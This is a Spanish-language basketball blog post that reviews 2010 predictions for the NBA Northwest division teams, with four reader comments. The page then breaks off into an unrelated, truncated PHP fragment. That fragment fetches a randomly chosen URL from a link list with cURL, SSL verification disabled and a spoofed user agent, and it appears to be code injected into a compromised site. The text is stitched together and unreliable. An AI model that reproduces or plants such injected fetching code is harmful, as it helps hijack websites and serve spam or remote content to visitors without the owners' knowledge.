Revisando pronósticos 2011: Northwest

01 de February de 2011 por Viva_Dirk

OKLAHOMA CITY THUNDER

Pronóstico Septiembre 2010: Primera Ronda
Probabilidad de acierto:
Media
Calificación pronóstico:
C+
Análisis

Como decía nuestro analista, se les escapó en verano la pieza que hubiese completado el equipo. Ninguno de los ala-pívots estrella del mercado acabó en Oklahoma y es sin duda su hueco a cubrir. La alternativa en el ataque estático es lo que separa a estos jóvenes de los auténticos favoritos al título. Actualmente están en la pelea por el factor cancha. Con él es más que posible que los veamos en segunda ronda.

La gran noticia es la explosión de Russell Westbrook como estrella de la liga. El potentísimo base ha resultado tan decisivo como el propio Durant en lo que va de campaña, aunque este sin duda sigue siendo el líder del equipo, algo aceptado por completo por parte de Westbrook. La temporada de Jeff Green ha ido de más a menos y no es lo que necesitan para parar a ala-pívots del tamaño de Gasol, Duncan o Nowitzki.

Salvo un movimiento en los despachos, estos Thunder tienen como techo la 2ª ronda de Playoffs, algo que no va a ser nada fácil de alcanzar contra equipos mucho más expertos como Utah, Denver o New Orleans. Desde luego sería un paso más en su escalada hacia la cima.

UTAH JAZZ

Pronóstico Septiembre 2010: En Playoffs con pocas posibilidades de alcanzar la 2ª ronda.
Probabilidad de acierto:
Muy alta
Calificación del pronóstico
: A+
Análisis

Extremadamente afinado estuvo nuestro analista. Los Jazz caminan 6º  de Conferencia, con Denver pisándoles los talones y Oklahoma a cierta distancia. Caer al 7º puesto supondría cruzarse otra vez con los Lakers y ser claramente superados en primera ronda, mientras que con el 6º puesto tendrían alguna posibilidad más, pero tampoco excesivas. Apuntábamos a la posibilidad de mover el expiring de Kirilenko, lo cual no ha sonado en ningún momento de la campaña como posibilidad de traspaso.

De nuevo una excelsa temporada de Deron Williams es lo que empuja la nave de Jerry Sloan. Del resto se puede decir como mucho que están cumpliendo sin más o incluso decepcionando ligeramente como en el caso de Al Jefferson. El encargado de suplir a Carlos Boozer está ofreciendo un nivel irregular, al igual que su compañero Paul Millsap, que empezó la campaña a gran nivel para bajar de forma alarmante su rendimiento después. Por ese lado solo cabe esperar que la recuperación de Okur le dé el plus que realmente necesitarán. Kirilenko, Bell, Miles y el resto de suplentes están cumpliendo sus papeles, pero ninguno supone un quebradero de cabeza para los rivales de forma constante.

Las sensaciones son de sobra conocidas para los aficionados del Energy Solutions Arena.

DENVER NUGGETS

Pronóstico Septiembre 2010: 2ª ronda
Probabilidad de acierto:
Baja
Calificación del pronóstico:
D
Análisis

Con todo lo que está pasando en Denver es muy poco probable que superen la primera ronda de Playoffs. Eso si Melo no se marcha antes y deja al equipo a merced de sus perseguidores, con lo que peligraría la post-temporada. Pero aun con Carmelo los Nuggets tienen difícil superar a Utah en la 6ª plaza,  un mal menor que supondría un enfrentamiento con Dallas/New Orleans/Oklahoma con el factor cancha en contra.

Tanto Carmelo como Billups están completando una campaña floja, y sin ellos al máximo nivel los Nuggets son un rival muy vulnerable para casi cualquiera. Estamos viendo la mejor versión de Arron Afflalo y un buen rendimiento de Ty Lawson, pero el resto (JR Smith, Al Harrington, Kenyon Martin) son demasiado irregulares por naturaleza. De todas maneras, Kenyon Martin sano mejora bastante lo ofrecido por sus sustitutos.

Todo sigue pendiente de Carmelo. En eso sí acertó de pleno nuestro analista, pero es una campaña decepcionante de Denver, que no tiene pinta de acabar con final feliz.

PORTLAND TRAILBLAZERS

Pronóstico Septiembre 2010: 2ª ronda
Probabilidadde acierto:
Muy baja
Calificación del pronóstico:
Sin calificación
Análisis

El título del análisis no podía ser más acertado, pero todo lo demás no lo habría previsto ni el mismísimo Nostradamus. Los Blazers tienen a día de hoy en la lista de lesionados a Greg Oden, Brandon Roy, Elliot Williams, Marcus Camby y Nicolas Batum, algo que por desgracia se ha convertido en habitual para Nate McMillan y los suyos. Bajo estas condiciones ningún pronóstico puede ser calificado.

Al margen de la actual temporada, la gran preocupación es la salud de Brandon Roy. Al parecer su lesión puede hacer que nunca vuelva al nivel que ha ofrecido hasta esta misma temporada. Roy podría convertirse en un jugador de 25 minutos o menos con contrato de superestrella. Con este panorama, actualmente todo queda en manos de un LaMarcus Aldridge que está respondiendo de manera ejemplar ante la baja de la teórica estrella del equipo, algo que también está aprovechando de forma excelente Wesley Matthews.

Si entran en Playoffs caerán irremediablemente frente a San Antonio. Quedar fuera no debería ser un drama para la franquicia, que debería empezar a pensar en un futuro sin Roy como jugador franquicia, por si acaso.

MINNESOTA TIMBERWOLVES

Pronóstico Septiembre 2010: Últimos puestos de la Conferencia.
Probabilidad de acierto:
Total
Calificación del pronóstico:
A+
Análisis

Como no podía ser de otra manera, los Wolves son ahora mismo el peor equipo del Oeste. Sin embargo, no parecen muy preocupados, sino más bien entusiasmados gracias a su nueva pareja Love-Beasley, que mola como pocas, y pensando en lo que van a draftear el próximo verano. Los resultados de esta campaña son lo de menos para ellos, que ya llevan así desde la marcha de Kevin Garnett.

La temporada de Love es salvaje. Sus números son históricos y parece capaz de ser uno de los jugadores interiores dominantes de los próximos años. Pero ya el año pasado tuvo sus más y sus menos con Al Jefferson, hecho que demuestra un carácter inconformista que puede provocar que se canse de perder 60 partidos cada temporada una vez se haya hecho un nombre en la liga y tenga un contrato acorde a sus números. De Michael Beasley no podemos adivinar lo que espera o lo que no, pues es un jugador que siempre ha mirado primero para sí mismo. Solo queda esperar la evolución de los Wesley Johnson, Johnny Flynn y Nikola Pekovic, amén del ‘afer Ricky Rubio’.

No sabemos cuándo tendrán un interés real por ganar partidos, que en teoría es de lo que va esto, pero al menos han encontrado algo sobre lo que construir.

Imágenes | AP Photos / Getty Images

Comenta

4 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Era extremadamente difícil prever el ambiente que se está viviendo en los Nuggets, y absolutamente imposible prever lo que les ha pasado a los Blazers. A partir de ahí, buenos análisis y predicciones.

    Y visto ahora, los Jazz debieron igualar la oferta de los Blazers por Matthews ¿no?

      Citar

  2. Busky23 dice:
    #2

    A pesar del gran déficit que tienen en la pintura confio mucho en estos Thunder,el titulo de división se lo van a llevar con la gorra y de cara a Play-off es muy probable una primera ronda contra los Mavs o los Hornets,uno de los 2 ira a la calle…a partir de ahí ya veremos que ocurre.
    Si este equipo consigue hacerse fuerte en la pintura va a ser uno de los grandes del wild wild west los próximos años.

      Citar

  3. Rompe dice:
    #3

    A los Thunder les falta precisamente lo que les sobra a los Wolves…

      Citar

  4. kantonyo dice:
    #4

    Lo de Portland es una tragedia. Un jugador como Roy, que a sus años ya era una referencia en la liga, capaz sin duda de llevar a un equipo a cotas muy altas y uno de los jugadores más prometedores a su llegada a la NBA como Greg Oden y que estaba empezando a dejar buenas actuaciones y buenos números. Los dos, lesionados de gravedad y con ciertas dudas sobre su regreso al nivel con el que se fueron…

    Los Jazz parece que se equivocaron con Matthews, pero yo prefiero pensar que fue Portland quien acertó, en un puesto que ya tenian a Roy y Rudy, y ademas hubieran podido retener a Webster y Bayless.

    En mi pronóstico en Denver, tampoco está muy claro que no puedan pasar de primera ronda… Con todo lo irregular que está siendo la temporada están en la pomada. Si acaba quedandose Carmelo se podría centrar más en el presente que en su futuro… por eso sigo pensando que Carmelo Decide.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>